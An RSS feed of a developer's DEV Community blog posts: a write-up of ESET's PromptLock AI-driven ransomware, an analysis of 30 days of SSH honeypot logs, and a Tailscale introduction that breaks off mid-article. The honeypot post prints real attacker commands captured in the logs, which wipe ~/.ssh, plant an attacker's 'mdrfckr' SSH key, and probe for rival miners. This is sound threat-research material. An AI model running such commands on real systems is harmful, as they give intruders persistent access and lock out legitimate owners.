<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Sofiane Hamlaoui</title>
    <description>The latest articles on DEV Community by Sofiane Hamlaoui (@sofianehamlaoui).</description>
    <link>https://dev.to/sofianehamlaoui</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F226576%2Fcadc935b-d839-4361-ae85-16059c569f00.png</url>
      <title>DEV Community: Sofiane Hamlaoui</title>
      <link>https://dev.to/sofianehamlaoui</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/sofianehamlaoui"/>
    <language>en</language>
    <item>
      <title>PromptLock: The Dawn of AI-Powered Ransomware - A Deep Dive into ESET's Groundbreaking Discovery</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Wed, 27 Aug 2025 17:58:34 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/promptlock-the-dawn-of-ai-powered-ransomware-a-deep-dive-into-esets-groundbreaking-discovery-m01</link>
      <guid>https://dev.to/sofianehamlaoui/promptlock-the-dawn-of-ai-powered-ransomware-a-deep-dive-into-esets-groundbreaking-discovery-m01</guid>
      <description>&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;The cybersecurity landscape has reached a significant milestone with &lt;strong&gt;ESET&lt;/strong&gt;'s discovery of PromptLock, the first known AI-powered ransomware. &lt;/p&gt;

&lt;p&gt;This groundbreaking malware leverages &lt;strong&gt;OpenAI's gpt-oss:20b model&lt;/strong&gt; through the Ollama API to dynamically generate malicious scripts, representing an unprecedented evolution in ransomware sophistication. &lt;/p&gt;

&lt;p&gt;While currently existing as a proof-of-concept, PromptLock signals a paradigm shift in how cybercriminals may weaponize artificial intelligence for malicious purposes.&lt;/p&gt;

&lt;p&gt;You can check my latest blog where I did write about such attacks and how imminent is this kind of attack will happen. &lt;a href="https://blog.sofiane.cc/post/the-growing-threat-the-dark-side-of-ai-and-llms" rel="noopener noreferrer"&gt;The Growing Threat: The Dark side of AI and LLMs&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1hbquk44n7fagl4s84op.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1hbquk44n7fagl4s84op.png" alt="AI Powered Ransomware" width="800" height="449"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Technical Architecture Behind PromptLock
&lt;/h3&gt;

&lt;h4&gt;
  
  
  AI-Powered Script Generation
&lt;/h4&gt;

&lt;p&gt;PromptLock represents a fundamental departure from traditional ransomware architectures. Unlike conventional malware that relies on static, pre-written code, this innovative threat uses hard-coded prompts to instruct an AI model to generate malicious Lua scripts on demand. The malware establishes a connection to OpenAI's gpt-oss:20b model via the Ollama API, creating a dynamic code generation system that can adapt its behavior in real-time.&lt;/p&gt;

&lt;p&gt;The ransomware employs a sophisticated approach by avoiding the download of the entire AI model, which would require several gigabytes of storage. Instead, attackers can establish proxy connections or tunnels from compromised networks to servers running the Ollama API with the model. This technique, classified under &lt;strong&gt;MITRE ATT&amp;amp;CK&lt;/strong&gt; framework as &lt;strong&gt;T1090.001&lt;/strong&gt; (Internal Proxy), is frequently employed in modern cyberattacks.&lt;/p&gt;

&lt;h4&gt;
  
  
  Cross-Platform Lua Script Execution
&lt;/h4&gt;

&lt;p&gt;The generated Lua scripts provide PromptLock with exceptional cross-platform compatibility, enabling operations across Windows, Linux, and macOS environments. These scripts perform multiple malicious functions including:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;File system enumeration&lt;/strong&gt; : Systematically mapping directory structures&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Target file inspection&lt;/strong&gt; : Identifying valuable data for encryption or exfiltration&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Selective data exfiltration&lt;/strong&gt; : Stealing sensitive information before encryption&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;File encryption operations&lt;/strong&gt; : Using the SPECK 128-bit algorithm&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  SPECK Encryption Implementation
&lt;/h3&gt;

&lt;p&gt;PromptLock utilizes the &lt;strong&gt;SPECK 128-bit&lt;/strong&gt; encryption algorithm, a lightweight block cipher developed by the National Security Agency (NSA). This cipher choice is particularly strategic for ransomware operations due to its:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;High performance on resource-constrained devices&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rapid encryption capabilities essential for quick file scrambling&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cross-platform compatibility supporting the malware's multi-OS targeting&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The SPECK algorithm operates on 128-bit blocks using a combination of simple operations including bitwise XOR, addition modulo operations, and bitwise shifts. Its lightweight nature ensures efficient encryption even on systems with limited computational resources.&lt;/p&gt;

&lt;h3&gt;
  
  
  Dynamic Threat Adaptation
&lt;/h3&gt;

&lt;p&gt;One of PromptLock's most concerning characteristics is its non-deterministic behavior. Since large language models inherently produce varying outputs for identical inputs, the malware can exhibit different behaviors across infections. This variability significantly complicates traditional signature-based detection methods, as &lt;strong&gt;indicators of compromise (IoCs)&lt;/strong&gt; may vary from one execution to another.&lt;/p&gt;

&lt;p&gt;The malware's AI-driven approach enables several advanced capabilities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Environment-specific adaptation&lt;/strong&gt; : Tailoring attacks based on system characteristics&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Evasion technique variation&lt;/strong&gt; : Implementing different obfuscation methods per deployment&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Dynamic payload generation&lt;/strong&gt; : Creating unique attack vectors for each target&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Current Implementation Status
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://x.com/ESETresearch/status/1960401908834693229" rel="noopener noreferrer"&gt;ESET researchers&lt;/a&gt;&lt;/strong&gt; emphasize that PromptLock appears to be a proof-of-concept or work-in-progress rather than fully operational malware deployed in active attacks. Several indicators support this assessment:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Incomplete functionality&lt;/strong&gt; : The destructive file deletion capability remains unimplemented&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Symbolic Bitcoin address&lt;/strong&gt; : The ransom payment address belongs to Bitcoin creator Satoshi Nakamoto rather than actual attackers&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Research-oriented indicators&lt;/strong&gt; : Multiple aspects suggest experimental rather than operational deployment&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Conclusion
&lt;/h3&gt;

&lt;p&gt;The discovery of PromptLock marks a watershed moment in cybersecurity history, representing the first successful integration of artificial intelligence into ransomware operations. While currently existing as a proof-of-concept, this development foreshadows a future where AI-powered malware becomes increasingly common and sophisticated.&lt;/p&gt;

&lt;p&gt;ESET's research demonstrates both the innovative potential of malicious AI applications and the critical importance of proactive cybersecurity research. Organizations must recognize that the traditional reactive approach to cybersecurity is insufficient against AI-powered threats that can adapt and evolve in real-time.&lt;/p&gt;

&lt;p&gt;The cybersecurity community must unite in developing advanced defensive capabilities that match the sophistication of these emerging threats. This includes investing in AI-powered detection systems, enhancing threat intelligence sharing, and fostering collaboration between security researchers and practitioners.&lt;/p&gt;

&lt;p&gt;As we enter this new era of AI-powered cyber threats, the lesson from PromptLock is clear: the future of cybersecurity will be determined by our ability to harness artificial intelligence not just as a tool for productivity, but as a fundamental component of our digital defense infrastructure. The time for preparation is now, before proof-of-concepts like PromptLock evolve into fully operational weapons in the hands of cybercriminals.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>What You Get After Running an SSH Honeypot for 30 Days</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Sun, 16 Jun 2024 21:32:59 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/what-you-get-after-running-an-ssh-honeypot-for-30-days-74k</link>
      <guid>https://dev.to/sofianehamlaoui/what-you-get-after-running-an-ssh-honeypot-for-30-days-74k</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj4hjzqxgrk7hw6r55b78.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj4hjzqxgrk7hw6r55b78.png" alt="First" width="681" height="366"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What is a honeypot?
&lt;/h3&gt;

&lt;p&gt;A honeypot detects and records attacks when an attacker tries to break into a system.&lt;/p&gt;

&lt;p&gt;The honeypot we will discuss here is an SSH honeypot.&lt;/p&gt;

&lt;h3&gt;
  
  
  Environment
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;OS: Ubuntu 24.04 LTS x86_64 
Kernel: 6.8.0-31-generic
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Login Attempts
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat X.log | grep -c "login attempt"
11599
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There were a total of 11,599 login attempts. Divided by 30 days, this means an average of 386 login attempts per day.&lt;/p&gt;

&lt;h3&gt;
  
  
  Used Usernames
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
   8181 root
    977 345gs5662d34
    359 admin
    198 pi
    105 0
     71 ubuntu
     51 ubnt
     46 support
     37 user
     30 oracle
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As expected, there are many attacks that target customary and default usernames.&lt;/p&gt;

&lt;p&gt;For the 345gs5662d34 user, according to the &lt;strong&gt;Aalborg University of Denmark Research&lt;/strong&gt; this could be the default credential for a &lt;strong&gt;Polycom CX600 IP telephone&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Check it here :&lt;br&gt;&lt;br&gt;
&lt;a href="https://vbn.aau.dk/ws/portalfiles/portal/573748244/sweetcam_honeypot_paper_1_.pdf" rel="noopener noreferrer"&gt;SweetCam: an IP Camera Honeypot&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Passwords
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
    977 345gs5662d34
    967 3245gs5662d34
    246 admin
    239 123456
    208 password
    155 0
     88 root
     75 raspberry
     73 123
     66 raspberryraspberry993311
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once again, the same as the default username for &lt;strong&gt;Polycom CX600 IP telephone&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Commands executed after login
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
   6775 echo -e "\x6F\x6B"
   1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
   1016 cd ~ &amp;amp;&amp;amp; rm -rf .ssh &amp;amp;&amp;amp; mkdir .ssh &amp;amp;&amp;amp; echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"&amp;gt;&amp;gt;.ssh/authorized_keys &amp;amp;&amp;amp; chmod -R go= ~/.ssh &amp;amp;&amp;amp; cd ~
    320 uname -s -v -n -r -m
    112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done &amp;lt; /proc/self/exe || cat /proc/self/exe;
     87 uname -a
     29 ps | grep '[Mm]iner'
     29 ps -ef | grep '[Mm]iner'
     29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
     29 ifconfig
     29 echo Hi | cat -n
     29 cat /proc/cpuinfo
     29 /ip cloud print
     23 whoami
     23 which ls
     23 w
     23 uname -m
     23 uname
     23 top
     23 lscpu | grep Model
     23 ls -lh $(which ls)
     23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
     23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
     23 crontab -l
     23 cat /proc/cpuinfo | grep name | wc -l
     23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
     23 cat /proc/cpuinfo | grep model | grep name | wc -l
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now the interesting part starts&lt;/p&gt;

&lt;h3&gt;
  
  
  The oinasf script
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzdy9pinyzxf442s7pb94.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzdy9pinyzxf442s7pb94.png" alt="First" width="800" height="19"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The execution of a mysterious script, ./oinasf, followed by attempts to read and display the system’s executable content, indicates a probing strategy for vulnerabilities or valuable information.&lt;/p&gt;

&lt;p&gt;The use of /ip cloud print suggests that bots target MikroTik routers to access or disrupt cloud-based services, while uname -s -m provides them with essential details about the operating system and machine architecture, valuable for crafting further actions tailored to the system’s specifics.&lt;/p&gt;

&lt;p&gt;In conclusion, these commands represent a clear strategy to infiltrate, assess, and establish control over targeted systems.&lt;/p&gt;

&lt;p&gt;They emphasize the bot’s preference for direct manipulation and sustained access highlighting the critical need for robust defenses against such common yet potentially devastating tactics.&lt;/p&gt;

&lt;h3&gt;
  
  
  The mdrfckr crypto miner
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fns5qa1z090rnufw3kejr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fns5qa1z090rnufw3kejr.png" alt="First" width="800" height="31"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This miner would simply create a cron job that would delete everything on the .ssh folder and add a single ssh key and lock other users out.&lt;/p&gt;

&lt;p&gt;After that it would kill other miners if they exist and just have the open field.&lt;/p&gt;

&lt;p&gt;You can check this repo of someone who already got hacked and the miner was used on his server : &lt;a href="https://github.com/dangoldin/crypto-miner-hack/" rel="noopener noreferrer"&gt;Dump of the crypto-miner that got installed on my system — Github&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The MIPS malware
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F20cmhkkmtyuo89tiw51j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F20cmhkkmtyuo89tiw51j.png" alt="First" width="800" height="14"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Probably another &lt;strong&gt;MIPS&lt;/strong&gt; (Multiprocessor without Interlocked Pipeline Stages) architecture malware, targeting routers and IoT devices.&lt;/p&gt;

&lt;p&gt;Here is a good read and analysis of the behaviour of a MIPS Malware :&lt;br&gt;&lt;br&gt;
&lt;a href="https://www.giac.org/paper/grem/2573/analyzing-backdoor-bot-mips-platform/124977" rel="noopener noreferrer"&gt;Analyzing a Backdoor/Bot for the MIPS Platform&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Sakura.sh Script
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3qnbo6ph8zmpyeovtyog.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3qnbo6ph8zmpyeovtyog.png" alt="First" width="800" height="14"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This script is part of the &lt;strong&gt;Gafgyt Malware&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gafgyt&lt;/strong&gt; , also known as &lt;strong&gt;BASHLITE&lt;/strong&gt; , is a botnet affecting Internet of Things (IoT) devices and Linux-based systems. The malware aims to compromise and gain control of these devices, often by exploiting weak or default passwords, as well as known vulnerabilities. Gafgyt has been around since 2014 and has evolved into multiple variants, each with its own set of features and capabilities, including the ability to launch distributed denial of service (DDoS) attacks.&lt;/p&gt;

&lt;p&gt;Here is &lt;a href="https://securityscorecard.com/wp-content/uploads/2024/01/Report-A-Detailed-Analysis-Of-The-Gafgyt-Malware-Targeting-IoT-Devices.pdf" rel="noopener noreferrer"&gt;A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices&lt;/a&gt;&lt;/p&gt;

</description>
      <category>oinasf</category>
      <category>mips</category>
      <category>mdrfkr</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>The magic of Tailscale</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Fri, 14 Jun 2024 04:13:32 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/the-magic-of-tailscale-1ekf</link>
      <guid>https://dev.to/sofianehamlaoui/the-magic-of-tailscale-1ekf</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmesxy4trjpexlp2z8dah.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmesxy4trjpexlp2z8dah.png" width="800" height="256"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you have multiple computers in your life including computer-adjacent things like network attached storage it’s likely you’d like to have access to each of those devices, always.&lt;/p&gt;

&lt;p&gt;If I need to inspect a file on my Synology in my house while I’m a passenger in the car, I want to be able to do so.&lt;/p&gt;

&lt;p&gt;The easiest way to do this is to expose the port(s) your device needs for remote access through your router/firewall.&lt;/p&gt;

&lt;p&gt;Unfortunately, this exposes your device to the entire Internet and that’s undesirable.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional VPNs
&lt;/h3&gt;

&lt;p&gt;The easy solution to this problem is a &lt;strong&gt;Virtual Private Network&lt;/strong&gt; , this means you run some sort of server inside your network that will allow devices outside the network to tunnel into the network.&lt;/p&gt;

&lt;p&gt;Once a device is on the VPN it can access anything within that network.&lt;/p&gt;

&lt;p&gt;Said differently, if your phone is on a VPN that is hosted in your house, then your phone can access all the devices in your house. Most corporate VPNs work this same way.&lt;/p&gt;

&lt;p&gt;If you’ll permit some hand-waving and over-simplification, traditional VPNs tend to be a sort of funnel where there is one server running inside the network you wish to tunnel into, and all clients connect to that server. That makes setup easy, but generally, it’s sort of an all-or-none scenario, you’re either on the VPN or you’re not.&lt;/p&gt;

&lt;p&gt;What if there was a better way?&lt;/p&gt;

&lt;h3&gt;
  
  
  Tailscale
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Tailscale&lt;/strong&gt; is a VPN service that makes your devices and applications accessible anywhere in the world, securely and effortlessly. It achieves this through encrypted point-to-point connections using the open-source &lt;strong&gt;WireGuard&lt;/strong&gt; protocol.&lt;/p&gt;

&lt;p&gt;Essentially, only devices within your private network can communicate with each other&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fenhrzodk0q6p5adbo81e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fenhrzodk0q6p5adbo81e.png" width="649" height="552"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Tailscale’s Approach
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Decentralized&lt;/strong&gt; : Avoids centralization by connecting nodes directly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lower Latency&lt;/strong&gt; : Devices communicate directly, resulting in lower latency.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Higher Throughput&lt;/strong&gt; : Traffic flows directly between machines, improving efficiency.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Key Exchange and Coordination&lt;/strong&gt; : Tailscale manages the exchange of public keys and coordinates the connections between nodes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network Traffic&lt;/strong&gt; : Traffic typically flows directly between nodes for the shortest path and best performance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ease of Use&lt;/strong&gt; : Tailscale is designed to be user-friendly, requiring minimal configuration from the user.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;By leveraging the WireGuard protocol and a decentralized network structure, Tailscale provides a secure and efficient way to connect your devices, no matter where they are located.&lt;/p&gt;

&lt;h3&gt;
  
  
  How it Works
&lt;/h3&gt;

&lt;p&gt;Tailscale is fast and reliable. Unlike traditional VPNs, which tunnel all network traffic through a central gateway server, Tailscale creates a peer-to-peer mesh network (called a tailnet):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F1024%2F0%2AwvFil2GD1o2wCX8p" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F1024%2F0%2AwvFil2GD1o2wCX8p" width="800" height="400"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The central gateway may or may not be close to users, thus resulting in higher latency. Because traffic is centralized, it can also act as a bottleneck, slowing down connections further.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F1024%2F0%2AcI6GlDC104ZXEbgj" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F1024%2F0%2AcI6GlDC104ZXEbgj" width="800" height="400"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;With Tailscale, each device is connected to the other directly, resulting in lower latency.&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Who’s it for?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Developers&lt;/strong&gt; can use Tailscale to publish experimental services to their team without the hassle of configuring firewall rules and network configurations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Small business owners&lt;/strong&gt; can provide their work-from-home employees with a secure way to access sensitive resources in minutes without spending thousands of dollars on traditional VPN solutions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enterprise leaders&lt;/strong&gt; can reduce their security risk by drastically reducing the complexity of internal networks. By using Access Control Lists and your existing identity provider, each user has the exact level of access they need — your accountants can access the payroll system, your support team can access the bug tracker, and your developers can access servers and databases.&lt;/p&gt;

&lt;h3&gt;
  
  
  Terminology and concepts
&lt;/h3&gt;

&lt;h3&gt;
  
  
  Access control lists
&lt;/h3&gt;

&lt;p&gt;An access control list (ACL) manages system access using rules in the tailnet policy file. You can use ACLs to filter traffic and enhance security by managing who and what can use which resources.&lt;/p&gt;

&lt;h3&gt;
  
  
  CL tags
&lt;/h3&gt;

&lt;p&gt;A tag lets you assign an identity (that’s separate from human users) to devices. You can use tags in your access rules to restrict access.&lt;/p&gt;

&lt;h3&gt;
  
  
  Admin console
&lt;/h3&gt;

&lt;p&gt;The admin console is the central location to view and manage your Tailscale network. You can manage nodes on your network, users and their permissions, and settings such as key expiry. The admin console also informs you if an update to the Tailscale client is available for your device. When you make changes from the admin console, the coordination server updates the changes to your tailnet immediately.&lt;/p&gt;

&lt;h3&gt;
  
  
  API
&lt;/h3&gt;

&lt;p&gt;API is an acronym for application programming interface. APIs define a set of rules to interact with an application or service programmatically. The Tailscale API lets you manage your Tailscale account and tailnet.&lt;/p&gt;

&lt;h3&gt;
  
  
  CLI
&lt;/h3&gt;

&lt;p&gt;CLI is an acronym for command line interface. The Tailscale CLI includes a robust set of commands with functionality that GUI applications might not have. The Tailscale CLI is installed automatically when you install Tailscale on Linux, macOS, or Windows.&lt;/p&gt;

&lt;h3&gt;
  
  
  Coordination server
&lt;/h3&gt;

&lt;p&gt;A coordination server is a central server that maintains a connection to all machines in your Tailscale network. It manages encryption keys, network changes, access policy changes, and maintains a connection to all machines in your Tailscale network. The coordination server is part of the control plane, not the data plane. It avoids being a performance bottleneck by not relaying traffic between machines.&lt;/p&gt;

&lt;h3&gt;
  
  
  Device
&lt;/h3&gt;

&lt;p&gt;A device is anything other than a user. It can be physical or virtual and sends, receives, or processes data on your Tailscale network.&lt;/p&gt;

&lt;h3&gt;
  
  
  Device key
&lt;/h3&gt;

&lt;p&gt;A device key is a unique public and private key pair for a specific device. More than one user can use a device key, but each device can only have one device key. The combination of a specific user with a device key represents a unique node.&lt;/p&gt;

&lt;h3&gt;
  
  
  Firewall
&lt;/h3&gt;

